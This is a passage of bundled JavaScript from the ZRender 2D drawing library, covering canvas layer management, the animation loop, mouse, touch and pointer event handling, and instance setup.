if (_zlevel === zlevel || _zlevel === zlevel + EL_AFTER_INCREMENTAL_INC) {\n                    var layer = this._layers[_zlevel];\n                    merge(layer, layerConfig[zlevel], true);\n                }\n            }\n        }\n    },\n\n    /**\n     * 删除指定层\n     * @param {number} zlevel 层所在的zlevel\n     */\n    delLayer: function (zlevel) {\n        var layers = this._layers;\n        var zlevelList = this._zlevelList;\n        var layer = layers[zlevel];\n        if (!layer) {\n            return;\n        }\n        layer.dom.parentNode.removeChild(layer.dom);\n        delete layers[zlevel];\n\n        zlevelList.splice(indexOf(zlevelList, zlevel), 1);\n    },\n\n    /**\n     * 区域大小变化后重绘\n     */\n    resize: function (width, height) {\n        if (!this._domRoot.style) { // Maybe in node or worker\n            if (width == null || height == null) {\n                return;\n            }\n            this._width = width;\n            this._height = height;\n\n            this.getLayer(CANVAS_ZLEVEL).resize(width, height);\n        }\n        else {\n            var domRoot = this._domRoot;\n            // FIXME Why ?\n            domRoot.style.display = 'none';\n\n            // Save input w/h\n            var opts = this._opts;\n            width != null && (opts.width = width);\n            height != null && (opts.height = height);\n\n            width = this._getSize(0);\n            height = this._getSize(1);\n\n            domRoot.style.display = '';\n\n            // 优化没有实际改变的resize\n            if (this._width !== width || height !== this._height) {\n                domRoot.style.width = width + 'px';\n                domRoot.style.height = height + 'px';\n\n                for (var id in this._layers) {\n                    if (this._layers.hasOwnProperty(id)) {\n                        this._layers[id].resize(width, height);\n                    }\n                }\n                each$1(this._progressiveLayers, function (layer) {\n                    layer.resize(width, height);\n                });\n\n                this.refresh(true);\n            }\n\n            this._width = width;\n            this._height = height;\n\n        }\n        return this;\n    },\n\n    /**\n     * 清除单独的一个层\n     * @param {number} zlevel\n     */\n    clearLayer: function (zlevel) {\n        var layer = this._layers[zlevel];\n        if (layer) {\n            layer.clear();\n        }\n    },\n\n    /**\n     * 释放\n     */\n    dispose: function () {\n        this.root.innerHTML = '';\n\n        this.root =\n        this.storage =\n\n        this._domRoot =\n        this._layers = null;\n    },\n\n    /**\n     * Get canvas which has all thing rendered\n     * @param {Object} opts\n     * @param {string} [opts.backgroundColor]\n     * @param {number} [opts.pixelRatio]\n     */\n    getRenderedCanvas: function (opts) {\n        opts = opts || {};\n        if (this._singleCanvas && !this._compositeManually) {\n            return this._layers[CANVAS_ZLEVEL].dom;\n        }\n\n        var imageLayer = new Layer('image', this, opts.pixelRatio || this.dpr);\n        imageLayer.initContext();\n        imageLayer.clear(false, opts.backgroundColor || this._backgroundColor);\n\n        if (opts.pixelRatio <= this.dpr) {\n            this.refresh();\n\n            var width = imageLayer.dom.width;\n            var height = imageLayer.dom.height;\n            var ctx = imageLayer.ctx;\n            this.eachLayer(function (layer) {\n                if (layer.__builtin__) {\n                    ctx.drawImage(layer.dom, 0, 0, width, height);\n                }\n                else if (layer.renderToCanvas) {\n                    imageLayer.ctx.save();\n                    layer.renderToCanvas(imageLayer.ctx);\n                    imageLayer.ctx.restore();\n                }\n            });\n        }\n        else {\n            // PENDING, echarts-gl and incremental rendering.\n            var scope = {};\n            var displayList = this.storage.getDisplayList(true);\n            for (var i = 0; i < displayList.length; i++) {\n                var el = displayList[i];\n                this._doPaintEl(el, imageLayer, true, scope);\n            }\n        }\n\n        return imageLayer.dom;\n    },\n    /**\n     * 获取绘图区域宽度\n     */\n    getWidth: function () {\n        return this._width;\n    },\n\n    /**\n     * 获取绘图区域高度\n     */\n    getHeight: function () {\n        return this._height;\n    },\n\n    _getSize: function (whIdx) {\n        var opts = this._opts;\n        var wh = ['width', 'height'][whIdx];\n        var cwh = ['clientWidth', 'clientHeight'][whIdx];\n        var plt = ['paddingLeft', 'paddingTop'][whIdx];\n        var prb = ['paddingRight', 'paddingBottom'][whIdx];\n\n        if (opts[wh] != null && opts[wh] !== 'auto') {\n            return parseFloat(opts[wh]);\n        }\n\n        var root = this.root;\n        // IE8 does not support getComputedStyle, but it use VML.\n        var stl = document.defaultView.getComputedStyle(root);\n\n        return (\n            (root[cwh] || parseInt10(stl[wh]) || parseInt10(root.style[wh]))\n            - (parseInt10(stl[plt]) || 0)\n            - (parseInt10(stl[prb]) || 0)\n        ) | 0;\n    },\n\n    pathToImage: function (path, dpr) {\n        dpr = dpr || this.dpr;\n\n        var canvas = document.createElement('canvas');\n        var ctx = canvas.getContext('2d');\n        var rect = path.getBoundingRect();\n        var style = path.style;\n        var shadowBlurSize = style.shadowBlur * dpr;\n        var shadowOffsetX = style.shadowOffsetX * dpr;\n        var shadowOffsetY = style.shadowOffsetY * dpr;\n        var lineWidth = style.hasStroke() ? style.lineWidth : 0;\n\n        var leftMargin = Math.max(lineWidth / 2, -shadowOffsetX + shadowBlurSize);\n        var rightMargin = Math.max(lineWidth / 2, shadowOffsetX + shadowBlurSize);\n        var topMargin = Math.max(lineWidth / 2, -shadowOffsetY + shadowBlurSize);\n        var bottomMargin = Math.max(lineWidth / 2, shadowOffsetY + shadowBlurSize);\n        var width = rect.width + leftMargin + rightMargin;\n        var height = rect.height + topMargin + bottomMargin;\n\n        canvas.width = width * dpr;\n        canvas.height = height * dpr;\n\n        ctx.scale(dpr, dpr);\n        ctx.clearRect(0, 0, width, height);\n        ctx.dpr = dpr;\n\n        var pathTransform = {\n            position: path.position,\n            rotation: path.rotation,\n            scale: path.scale\n        };\n        path.position = [leftMargin - rect.x, topMargin - rect.y];\n        path.rotation = 0;\n        path.scale = [1, 1];\n        path.updateTransform();\n        if (path) {\n            path.brush(ctx);\n        }\n\n        var ImageShape = ZImage;\n        var imgShape = new ImageShape({\n            style: {\n                x: 0,\n                y: 0,\n                image: canvas\n            }\n        });\n\n        if (pathTransform.position != null) {\n            imgShape.position = path.position = pathTransform.position;\n        }\n\n        if (pathTransform.rotation != null) {\n            imgShape.rotation = path.rotation = pathTransform.rotation;\n        }\n\n        if (pathTransform.scale != null) {\n            imgShape.scale = path.scale = pathTransform.scale;\n        }\n\n        return imgShape;\n    }\n};\n\n/**\n * Animation main class, dispatch and manage all animation controllers\n *\n * @module zrender/animation/Animation\n * @author pissang(https://github.com/pissang)\n */\n// TODO Additive animation\n// http://iosoteric.com/additive-animations-animatewithduration-in-ios-8/\n// https://developer.apple.com/videos/wwdc2014/#236\n\n/**\n * @typedef {Object} IZRenderStage\n * @property {Function} update\n */\n\n/**\n * @alias module:zrender/animation/Animation\n * @constructor\n * @param {Object} [options]\n * @param {Function} [options.onframe]\n * @param {IZRenderStage} [options.stage]\n * @example\n *     var animation = new Animation();\n *     var obj = {\n *         x: 100,\n *         y: 100\n *     };\n *     animation.animate(node.position)\n *         .when(1000, {\n *             x: 500,\n *             y: 500\n *         })\n *         .when(2000, {\n *             x: 100,\n *             y: 100\n *         })\n *         .start('spline');\n */\nvar Animation = function (options) {\n\n    options = options || {};\n\n    this.stage = options.stage || {};\n\n    this.onframe = options.onframe || function () {};\n\n    // private properties\n    this._clips = [];\n\n    this._running = false;\n\n    this._time;\n\n    this._pausedTime;\n\n    this._pauseStart;\n\n    this._paused = false;\n\n    Eventful.call(this);\n};\n\nAnimation.prototype = {\n\n    constructor: Animation,\n    /**\n     * Add clip\n     * @param {module:zrender/animation/Clip} clip\n     */\n    addClip: function (clip) {\n        this._clips.push(clip);\n    },\n    /**\n     * Add animator\n     * @param {module:zrender/animation/Animator} animator\n     */\n    addAnimator: function (animator) {\n        animator.animation = this;\n        var clips = animator.getClips();\n        for (var i = 0; i < clips.length; i++) {\n            this.addClip(clips[i]);\n        }\n    },\n    /**\n     * Delete animation clip\n     * @param {module:zrender/animation/Clip} clip\n     */\n    removeClip: function (clip) {\n        var idx = indexOf(this._clips, clip);\n        if (idx >= 0) {\n            this._clips.splice(idx, 1);\n        }\n    },\n\n    /**\n     * Delete animation clip\n     * @param {module:zrender/animation/Animator} animator\n     */\n    removeAnimator: function (animator) {\n        var clips = animator.getClips();\n        for (var i = 0; i < clips.length; i++) {\n            this.removeClip(clips[i]);\n        }\n        animator.animation = null;\n    },\n\n    _update: function () {\n        var time = new Date().getTime() - this._pausedTime;\n        var delta = time - this._time;\n        var clips = this._clips;\n        var len = clips.length;\n\n        var deferredEvents = [];\n        var deferredClips = [];\n        for (var i = 0; i < len; i++) {\n            var clip = clips[i];\n            var e = clip.step(time, delta);\n            // Throw out the events need to be called after\n            // stage.update, like destroy\n            if (e) {\n                deferredEvents.push(e);\n                deferredClips.push(clip);\n            }\n        }\n\n        // Remove the finished clip\n        for (var i = 0; i < len;) {\n            if (clips[i]._needsRemove) {\n                clips[i] = clips[len - 1];\n                clips.pop();\n                len--;\n            }\n            else {\n                i++;\n            }\n        }\n\n        len = deferredEvents.length;\n        for (var i = 0; i < len; i++) {\n            deferredClips[i].fire(deferredEvents[i]);\n        }\n\n        this._time = time;\n\n        this.onframe(delta);\n\n        // 'frame' should be triggered before stage, because upper application\n        // depends on the sequence (e.g., echarts-stream and finish\n        // event judge)\n        this.trigger('frame', delta);\n\n        if (this.stage.update) {\n            this.stage.update();\n        }\n    },\n\n    _startLoop: function () {\n        var self = this;\n\n        this._running = true;\n\n        function step() {\n            if (self._running) {\n\n                requestAnimationFrame(step);\n\n                !self._paused && self._update();\n            }\n        }\n\n        requestAnimationFrame(step);\n    },\n\n    /**\n     * Start animation.\n     */\n    start: function () {\n\n        this._time = new Date().getTime();\n        this._pausedTime = 0;\n\n        this._startLoop();\n    },\n\n    /**\n     * Stop animation.\n     */\n    stop: function () {\n        this._running = false;\n    },\n\n    /**\n     * Pause animation.\n     */\n    pause: function () {\n        if (!this._paused) {\n            this._pauseStart = new Date().getTime();\n            this._paused = true;\n        }\n    },\n\n    /**\n     * Resume animation.\n     */\n    resume: function () {\n        if (this._paused) {\n            this._pausedTime += (new Date().getTime()) - this._pauseStart;\n            this._paused = false;\n        }\n    },\n\n    /**\n     * Clear animation.\n     */\n    clear: function () {\n        this._clips = [];\n    },\n\n    /**\n     * Whether animation finished.\n     */\n    isFinished: function () {\n        return !this._clips.length;\n    },\n\n    /**\n     * Creat animator for a target, whose props can be animated.\n     *\n     * @param  {Object} target\n     * @param  {Object} options\n     * @param  {boolean} [options.loop=false] Whether loop animation.\n     * @param  {Function} [options.getter=null] Get value from target.\n     * @param  {Function} [options.setter=null] Set value to target.\n     * @return {module:zrender/animation/Animation~Animator}\n     */\n    // TODO Gap\n    animate: function (target, options) {\n        options = options || {};\n\n        var animator = new Animator(\n            target,\n            options.loop,\n            options.getter,\n            options.setter\n        );\n\n        this.addAnimator(animator);\n\n        return animator;\n    }\n};\n\nmixin(Animation, Eventful);\n\n/* global document */\n\nvar TOUCH_CLICK_DELAY = 300;\n\nvar globalEventSupported = env$1.domSupported;\n\n\nvar localNativeListenerNames = (function () {\n    var mouseHandlerNames = [\n        'click', 'dblclick', 'mousewheel', 'mouseout',\n        'mouseup', 'mousedown', 'mousemove', 'contextmenu'\n    ];\n    var touchHandlerNames = [\n        'touchstart', 'touchend', 'touchmove'\n    ];\n    var pointerEventNameMap = {\n        pointerdown: 1, pointerup: 1, pointermove: 1, pointerout: 1\n    };\n    var pointerHandlerNames = map(mouseHandlerNames, function (name) {\n        var nm = name.replace('mouse', 'pointer');\n        return pointerEventNameMap.hasOwnProperty(nm) ? nm : name;\n    });\n\n    return {\n        mouse: mouseHandlerNames,\n        touch: touchHandlerNames,\n        pointer: pointerHandlerNames\n    };\n})();\n\nvar globalNativeListenerNames = {\n    mouse: ['mousemove', 'mouseup'],\n    pointer: ['pointermove', 'pointerup']\n};\n\n\nfunction eventNameFix(name) {\n    return (name === 'mousewheel' && env$1.browser.firefox) ? 'DOMMouseScroll' : name;\n}\n\nfunction isPointerFromTouch(event) {\n    var pointerType = event.pointerType;\n    return pointerType === 'pen' || pointerType === 'touch';\n}\n\n// function useMSGuesture(handlerProxy, event) {\n//     return isPointerFromTouch(event) && !!handlerProxy._msGesture;\n// }\n\n// function onMSGestureChange(proxy, event) {\n//     if (event.translationX || event.translationY) {\n//         // mousemove is carried by MSGesture to reduce the sensitivity.\n//         proxy.handler.dispatchToElement(event.target, 'mousemove', event);\n//     }\n//     if (event.scale !== 1) {\n//         event.pinchX = event.offsetX;\n//         event.pinchY = event.offsetY;\n//         event.pinchScale = event.scale;\n//         proxy.handler.dispatchToElement(event.target, 'pinch', event);\n//     }\n// }\n\n/**\n * Prevent mouse event from being dispatched after Touch Events action\n * @see <https://github.com/deltakosh/handjs/blob/master/src/hand.base.js>\n * 1. Mobile browsers dispatch mouse events 300ms after touchend.\n * 2. Chrome for Android dispatch mousedown for long-touch about 650ms\n * Result: Blocking Mouse Events for 700ms.\n *\n * @param {DOMHandlerScope} scope\n */\nfunction setTouchTimer(scope) {\n    scope.touching = true;\n    if (scope.touchTimer != null) {\n        clearTimeout(scope.touchTimer);\n        scope.touchTimer = null;\n    }\n    scope.touchTimer = setTimeout(function () {\n        scope.touching = false;\n        scope.touchTimer = null;\n    }, 700);\n}\n\n// Mark touch, which is useful in distinguish touch and\n// mouse event in upper applicatoin.\nfunction markTouch(event) {\n    event && (event.zrByTouch = true);\n}\n\n\n// function markTriggeredFromLocal(event) {\n//     event && (event.__zrIsFromLocal = true);\n// }\n\n// function isTriggeredFromLocal(instance, event) {\n//     return !!(event && event.__zrIsFromLocal);\n// }\n\nfunction normalizeGlobalEvent(instance, event) {\n    // offsetX, offsetY still need to be calculated. They are necessary in the event\n    // handlers of the upper applications. Set `true` to force calculate them.\n    return normalizeEvent(instance.dom, new FakeGlobalEvent(instance, event), true);\n}\n\n/**\n * Detect whether the given el is in `painterRoot`.\n */\nfunction isLocalEl(instance, el) {\n    var elTmp = el;\n    var isLocal = false;\n    while (elTmp && elTmp.nodeType !== 9\n        && !(\n            isLocal = elTmp.domBelongToZr\n                || (elTmp !== el && elTmp === instance.painterRoot)\n        )\n    ) {\n        elTmp = elTmp.parentNode;\n    }\n    return isLocal;\n}\n\n/**\n * Make a fake event but not change the original event,\n * becuase the global event probably be used by other\n * listeners not belonging to zrender.\n * @class\n */\nfunction FakeGlobalEvent(instance, event) {\n    this.type = event.type;\n    this.target = this.currentTarget = instance.dom;\n    this.pointerType = event.pointerType;\n    // Necessray for the force calculation of zrX, zrY\n    this.clientX = event.clientX;\n    this.clientY = event.clientY;\n    // Because we do not mount global listeners to touch events,\n    // we do not copy `targetTouches` and `changedTouches` here.\n}\nvar fakeGlobalEventProto = FakeGlobalEvent.prototype;\n// we make the default methods on the event do nothing,\n// otherwise it is dangerous. See more details in\n// [Drag outside] in `Handler.js`.\nfakeGlobalEventProto.stopPropagation =\n    fakeGlobalEventProto.stopImmediatePropagation =\n    fakeGlobalEventProto.preventDefault = noop;\n\n\n/**\n * Local DOM Handlers\n * @this {HandlerProxy}\n */\nvar localDOMHandlers = {\n\n    mousedown: function (event) {\n        event = normalizeEvent(this.dom, event);\n\n        this._mayPointerCapture = [event.zrX, event.zrY];\n\n        this.trigger('mousedown', event);\n    },\n\n    mousemove: function (event) {\n        event = normalizeEvent(this.dom, event);\n\n        var downPoint = this._mayPointerCapture;\n        if (downPoint && (event.zrX !== downPoint[0] || event.zrY !== downPoint[1])) {\n            togglePointerCapture(this, true);\n        }\n\n        this.trigger('mousemove', event);\n    },\n\n    mouseup: function (event) {\n        event = normalizeEvent(this.dom, event);\n\n        togglePointerCapture(this, false);\n\n        this.trigger('mouseup', event);\n    },\n\n    mouseout: function (event) {\n        event = normalizeEvent(this.dom, event);\n\n        // Similarly to the browser did on `document` and touch event,\n        // `globalout` will be delayed to final pointer cature release.\n        if (this._pointerCapturing) {\n            event.zrEventControl = 'no_globalout';\n        }\n\n        // There might be some doms created by upper layer application\n        // at the same level of painter.getViewportRoot() (e.g., tooltip\n        // dom created by echarts), where 'globalout' event should not\n        // be triggered when mouse enters these doms. (But 'mouseout'\n        // should be triggered at the original hovered element as usual).\n        var element = event.toElement || event.relatedTarget;\n        event.zrIsToLocalDOM = isLocalEl(this, element);\n\n        this.trigger('mouseout', event);\n    },\n\n    touchstart: function (event) {\n        // Default mouse behaviour should not be disabled here.\n        // For example, page may needs to be slided.\n        event = normalizeEvent(this.dom, event);\n\n        markTouch(event);\n\n        this._lastTouchMoment = new Date();\n\n        this.handler.processGesture(event, 'start');\n\n        // For consistent event listener for both touch device and mouse device,\n        // we simulate \"mouseover-->mousedown\" in touch device. So we trigger\n        // `mousemove` here (to trigger `mouseover` inside), and then trigger\n        // `mousedown`.\n        localDOMHandlers.mousemove.call(this, event);\n        localDOMHandlers.mousedown.call(this, event);\n    },\n\n    touchmove: function (event) {\n        event = normalizeEvent(this.dom, event);\n\n        markTouch(event);\n\n        this.handler.processGesture(event, 'change');\n\n        // Mouse move should always be triggered no matter whether\n        // there is gestrue event, because mouse move and pinch may\n        // be used at the same time.\n        localDOMHandlers.mousemove.call(this, event);\n    },\n\n    touchend: function (event) {\n        event = normalizeEvent(this.dom, event);\n\n        markTouch(event);\n\n        this.handler.processGesture(event, 'end');\n\n        localDOMHandlers.mouseup.call(this, event);\n\n        // Do not trigger `mouseout` here, in spite of `mousemove`(`mouseover`) is\n        // triggered in `touchstart`. This seems to be illogical, but by this mechanism,\n        // we can conveniently implement \"hover style\" in both PC and touch device just\n        // by listening to `mouseover` to add \"hover style\" and listening to `mouseout`\n        // to remove \"hover style\" on an element, without any additional code for\n        // compatibility. (`mouseout` will not be triggered in `touchend`, so \"hover\n        // style\" will remain for user view)\n\n        // click event should always be triggered no matter whether\n        // there is gestrue event. System click can not be prevented.\n        if (+new Date() - this._lastTouchMoment < TOUCH_CLICK_DELAY) {\n            localDOMHandlers.click.call(this, event);\n        }\n    },\n\n    pointerdown: function (event) {\n        localDOMHandlers.mousedown.call(this, event);\n\n        // if (useMSGuesture(this, event)) {\n        //     this._msGesture.addPointer(event.pointerId);\n        // }\n    },\n\n    pointermove: function (event) {\n        // FIXME\n        // pointermove is so sensitive that it always triggered when\n        // tap(click) on touch screen, which affect some judgement in\n        // upper application. So, we dont support mousemove on MS touch\n        // device yet.\n        if (!isPointerFromTouch(event)) {\n            localDOMHandlers.mousemove.call(this, event);\n        }\n    },\n\n    pointerup: function (event) {\n        localDOMHandlers.mouseup.call(this, event);\n    },\n\n    pointerout: function (event) {\n        // pointerout will be triggered when tap on touch screen\n        // (IE11+/Edge on MS Surface) after click event triggered,\n        // which is inconsistent with the mousout behavior we defined\n        // in touchend. So we unify them.\n        // (check localDOMHandlers.touchend for detailed explanation)\n        if (!isPointerFromTouch(event)) {\n            localDOMHandlers.mouseout.call(this, event);\n        }\n    }\n\n};\n\n/**\n * Othere DOM UI Event handlers for zr dom.\n * @this {HandlerProxy}\n */\neach$1(['click', 'mousewheel', 'dblclick', 'contextmenu'], function (name) {\n    localDOMHandlers[name] = function (event) {\n        event = normalizeEvent(this.dom, event);\n        this.trigger(name, event);\n    };\n});\n\n\n/**\n * DOM UI Event handlers for global page.\n *\n * [Caution]:\n * those handlers should both support in capture phase and bubble phase!\n *\n * @this {HandlerProxy}\n */\nvar globalDOMHandlers = {\n\n    pointermove: function (event) {\n        // FIXME\n        // pointermove is so sensitive that it always triggered when\n        // tap(click) on touch screen, which affect some judgement in\n        // upper application. So, we dont support mousemove on MS touch\n        // device yet.\n        if (!isPointerFromTouch(event)) {\n            globalDOMHandlers.mousemove.call(this, event);\n        }\n    },\n\n    pointerup: function (event) {\n        globalDOMHandlers.mouseup.call(this, event);\n    },\n\n    mousemove: function (event) {\n        this.trigger('mousemove', event);\n    },\n\n    mouseup: function (event) {\n        var pointerCaptureReleasing = this._pointerCapturing;\n\n        togglePointerCapture(this, false);\n\n        this.trigger('mouseup', event);\n\n        if (pointerCaptureReleasing) {\n            event.zrEventControl = 'only_globalout';\n            this.trigger('mouseout', event);\n        }\n    }\n\n};\n\n\n/**\n * @param {HandlerProxy} instance\n * @param {DOMHandlerScope} scope\n */\nfunction mountLocalDOMEventListeners(instance, scope) {\n    var domHandlers = scope.domHandlers;\n\n    if (env$1.pointerEventsSupported) { // Only IE11+/Edge\n        // 1. On devices that both enable touch and mouse (e.g., MS Surface and lenovo X240),\n        // IE11+/Edge do not trigger touch event, but trigger pointer event and mouse event\n        // at the same time.\n        // 2. On MS Surface, it probablely only trigger mousedown but no mouseup when tap on\n        // screen, which do not occurs in pointer event.\n        // So we use pointer event to both detect touch gesture and mouse behavior.\n        each$1(localNativeListenerNames.pointer, function (nativeEventName) {\n            mountSingleDOMEventListener(scope, nativeEventName, function (event) {\n                // markTriggeredFromLocal(event);\n                domHandlers[nativeEventName].call(instance, event);\n            });\n        });\n\n        // FIXME\n        // Note: MS Gesture require CSS touch-action set. But touch-action is not reliable,\n        // which does not prevent defuault behavior occasionally (which may cause view port\n        // zoomed in but use can not zoom it back). And event.preventDefault() does not work.\n        // So we have to not to use MSGesture and not to support touchmove and pinch on MS\n        // touch screen. And we only support click behavior on MS touch screen now.\n\n        // MS Gesture Event is only supported on IE11+/Edge and on Windows 8+.\n        // We dont support touch on IE on win7.\n        // See <https://msdn.microsoft.com/en-us/library/dn433243(v=vs.85).aspx>\n        // if (typeof MSGesture === 'function') {\n        //     (this._msGesture = new MSGesture()).target = dom; // jshint ignore:line\n        //     dom.addEventListener('MSGestureChange', onMSGestureChange);\n        // }\n    }\n    else {\n        if (env$1.touchEventsSupported) {\n            each$1(localNativeListenerNames.touch, function (nativeEventName) {\n                mountSingleDOMEventListener(scope, nativeEventName, function (event) {\n                    // markTriggeredFromLocal(event);\n                    domHandlers[nativeEventName].call(instance, event);\n                    setTouchTimer(scope);\n                });\n            });\n            // Handler of 'mouseout' event is needed in touch mode, which will be mounted below.\n            // addEventListener(root, 'mouseout', this._mouseoutHandler);\n        }\n\n        // 1. Considering some devices that both enable touch and mouse event (like on MS Surface\n        // and lenovo X240, @see #2350), we make mouse event be always listened, otherwise\n        // mouse event can not be handle in those devices.\n        // 2. On MS Surface, Chrome will trigger both touch event and mouse event. How to prevent\n        // mouseevent after touch event triggered, see `setTouchTimer`.\n        each$1(localNativeListenerNames.mouse, function (nativeEventName) {\n            mountSingleDOMEventListener(scope, nativeEventName, function (event) {\n                event = getNativeEvent(event);\n                if (!scope.touching) {\n                    // markTriggeredFromLocal(event);\n                    domHandlers[nativeEventName].call(instance, event);\n                }\n            });\n        });\n    }\n}\n\n/**\n * @param {HandlerProxy} instance\n * @param {DOMHandlerScope} scope\n */\nfunction mountGlobalDOMEventListeners(instance, scope) {\n    // Only IE11+/Edge. See the comment in `mountLocalDOMEventListeners`.\n    if (env$1.pointerEventsSupported) {\n        each$1(globalNativeListenerNames.pointer, mount);\n    }\n    // Touch event has implemented \"drag outside\" so we do not mount global listener for touch event.\n    // (see https://www.w3.org/TR/touch-events/#the-touchmove-event)\n    // We do not consider \"both-support-touch-and-mouse device\" for this feature (see the comment of\n    // `mountLocalDOMEventListeners`) to avoid bugs util some requirements come.\n    else if (!env$1.touchEventsSupported) {\n        each$1(globalNativeListenerNames.mouse, mount);\n    }\n\n    function mount(nativeEventName) {\n        function nativeEventListener(event) {\n            event = getNativeEvent(event);\n            // See the reason in [Drag outside] in `Handler.js`\n            // This checking supports both `useCapture` or not.\n            // PENDING: if there is performance issue in some devices,\n            // we probably can not use `useCapture` and change a easier\n            // to judes whether local (mark).\n            if (!isLocalEl(instance, event.target)) {\n                event = normalizeGlobalEvent(instance, event);\n                scope.domHandlers[nativeEventName].call(instance, event);\n            }\n        }\n        mountSingleDOMEventListener(\n            scope, nativeEventName, nativeEventListener,\n            {capture: true} // See [Drag Outside] in `Handler.js`\n        );\n    }\n}\n\nfunction mountSingleDOMEventListener(scope, nativeEventName, listener, opt) {\n    scope.mounted[nativeEventName] = listener;\n    scope.listenerOpts[nativeEventName] = opt;\n    addEventListener(scope.domTarget, eventNameFix(nativeEventName), listener, opt);\n}\n\nfunction unmountDOMEventListeners(scope) {\n    var mounted = scope.mounted;\n    for (var nativeEventName in mounted) {\n        if (mounted.hasOwnProperty(nativeEventName)) {\n            removeEventListener(\n                scope.domTarget, eventNameFix(nativeEventName), mounted[nativeEventName],\n                scope.listenerOpts[nativeEventName]\n            );\n        }\n    }\n    scope.mounted = {};\n}\n\n/**\n * See [Drag Outside] in `Handler.js`.\n * @implement\n * @param {boolean} isPointerCapturing Should never be `null`/`undefined`.\n *        `true`: start to capture pointer if it is not capturing.\n *        `false`: end the capture if it is capturing.\n */\nfunction togglePointerCapture(instance, isPointerCapturing) {\n    instance._mayPointerCapture = null;\n\n    if (globalEventSupported && (instance._pointerCapturing ^ isPointerCapturing)) {\n        instance._pointerCapturing = isPointerCapturing;\n\n        var globalHandlerScope = instance._globalHandlerScope;\n        isPointerCapturing\n            ? mountGlobalDOMEventListeners(instance, globalHandlerScope)\n            : unmountDOMEventListeners(globalHandlerScope);\n    }\n}\n\n/**\n * @inner\n * @class\n */\nfunction DOMHandlerScope(domTarget, domHandlers) {\n    this.domTarget = domTarget;\n    this.domHandlers = domHandlers;\n\n    // Key: eventName, value: mounted handler funcitons.\n    // Used for unmount.\n    this.mounted = {};\n    this.listenerOpts = {};\n\n    this.touchTimer = null;\n    this.touching = false;\n}\n\n/**\n * @public\n * @class\n */\nfunction HandlerDomProxy(dom, painterRoot) {\n    Eventful.call(this);\n\n    this.dom = dom;\n    this.painterRoot = painterRoot;\n\n    this._localHandlerScope = new DOMHandlerScope(dom, localDOMHandlers);\n\n    if (globalEventSupported) {\n        this._globalHandlerScope = new DOMHandlerScope(document, globalDOMHandlers);\n    }\n\n    /**\n     * @type {boolean}\n     */\n    this._pointerCapturing = false;\n    /**\n     * @type {Array.<number>} [x, y] or null.\n     */\n    this._mayPointerCapture = null;\n\n    mountLocalDOMEventListeners(this, this._localHandlerScope);\n}\n\nvar handlerDomProxyProto = HandlerDomProxy.prototype;\n\nhandlerDomProxyProto.dispose = function () {\n    unmountDOMEventListeners(this._localHandlerScope);\n    if (globalEventSupported) {\n        unmountDOMEventListeners(this._globalHandlerScope);\n    }\n};\n\nhandlerDomProxyProto.setCursor = function (cursorStyle) {\n    this.dom.style && (this.dom.style.cursor = cursorStyle || 'default');\n};\n\n\nmixin(HandlerDomProxy, Eventful);\n\n/*!\n* ZRender, a high performance 2d drawing library.\n*\n* Copyright (c) 2013, Baidu Inc.\n* All rights reserved.\n*\n* LICENSE\n* https://github.com/ecomfe/zrender/blob/master/LICENSE.txt\n*/\n\nvar useVML = !env$1.canvasSupported;\n\nvar painterCtors = {\n    canvas: Painter\n};\n\nvar instances$1 = {};    // ZRender实例map索引\n\n/**\n * @type {string}\n */\nvar version$1 = '4.3.0';\n\n/**\n * Initializing a zrender instance\n * @param {HTMLElement} dom\n * @param {Object} [opts]\n * @param {string} [opts.renderer='canvas'] 'canvas' or 'svg'\n * @param {number} [opts.devicePixelRatio]\n * @param {number|string} [opts.width] Can be 'auto' (the same as null/undefined)\n * @param {number|string} [opts.height] Can be 'auto' (the same as null/undefined)\n * @return {module:zrender/ZRender}\n */\nfunction init$1(dom, opts) {\n    var zr = new ZRender(guid(), dom, opts);\n    instances$1[zr.id] = zr;\n    return zr;\n}\n\n/**\n * Dispose zrender instance\n * @param {module:zrender/ZRender} zr\n */\nfunction dispose$1(zr) {\n    if (zr) {\n        zr.dispose();\n    }\n    else {\n        for (var key in instances$1) {\n            if (instances$1.hasOwnProperty(key)) {\n                instances$1[key].dispose();\n            }\n        }\n        instances$1 = {};\n    }\n\n    return this;\n}\n\n/**\n * Get zrender instance by id\n * @param {string} id zrender instance id\n * @return {module:zrender/ZRender}\n */\nfunction getInstance(id) {\n    return instances$1[id];\n}\n\nfunction registerPainter(name, Ctor) {\n    painterCtors[name] = Ctor;\n}\n\nfunction delInstance(id) {\n    delete instances$1[id];\n}\n\n/**\n * @module zrender/ZRender\n */\n/**\n * @constructor\n * @alias module:zrender/ZRender\n * @param {string} id\n * @param {HTMLElement} dom\n * @param {Object} opts\n * @param {string} [opts.renderer='canvas'] 'canvas' or 'svg'\n * @param {number} [opts.devicePixelRatio]\n * @param {number} [opts.width] Can be 'auto' (the same as null/undefined)\n * @param {number} [opts.height] Can be 'auto' (the same as null/undefined)\n */\nvar ZRender = function (id, dom, opts) {\n\n    opts = opts || {};\n\n    /**\n     * @type {HTMLDomElement}\n     */\n    this.dom = dom;\n\n    /**\n     * @type {string}\n     */\n    this.id = id;\n\n    var self = this;\n    var storage = new Storage();\n\n    var rendererType = opts.renderer;\n    // TODO WebGL\n    if (useVML) {\n        if (!painterCtors.vml) {\n            throw new Error('You need to require \\'zrender/vml/vml\\' to support IE8');\n        }\n        rendererType = 'vml';\n    }\n    else if (!rendererType || !painterCtors[rendererType]) {\n        rendererType = 'canvas';\n    }\n    var painter = new painterCtors[rendererType](dom, storage, opts, id);\n\n    this.storage = storage;\n    this.painter = painter;\n\n    var handerProxy = (!env$1.node && !env$1.worker) ? new HandlerDomProxy(painter.getViewportRoot(), painter.root) : null;\n    this.handler = new Handler(storage, painter, handerProxy, painter.root);\n\n    /**\n     * @type {module:zrender/animation/Animation}\n     */\n    this.animation = new Animation({\n        stage: {\n            update: bind(this.flush, this)\n        }\n    });\n    this.animation.start();\n\n    /**\n     * @type {boolean}\n     * @private\n     */\n    this._needsRefresh;\n\n    // 修改 storage.delFromStorage, 每次删除元素之前删除动画\n    // FIXME 有点ugly\n    var oldDelFromStorage = storage.delFromStorage;\n    var oldAddToStorage = storage.addToStorage;\n\n    storage.delFromStorage = function (el) {\n        oldDelFromStorage.call(storage, el);\n\n        el && el.removeSelfFromZr(self);\n    };\n\n    storage.addToStorage = function (el) {\n        oldAddToStorage.call(storage, el);\n\n        el.addSelfToZr(self);\n    };\n};\n\nZRender.prototype = {\n\n    constructor: ZRender,\n    /**\n     * 获取实例唯一标识\n     * @return {string}\n     */\n    getId: function () {\n        return this.id;\n    },\n\n    /**\n     * 添加元素\n     * @param  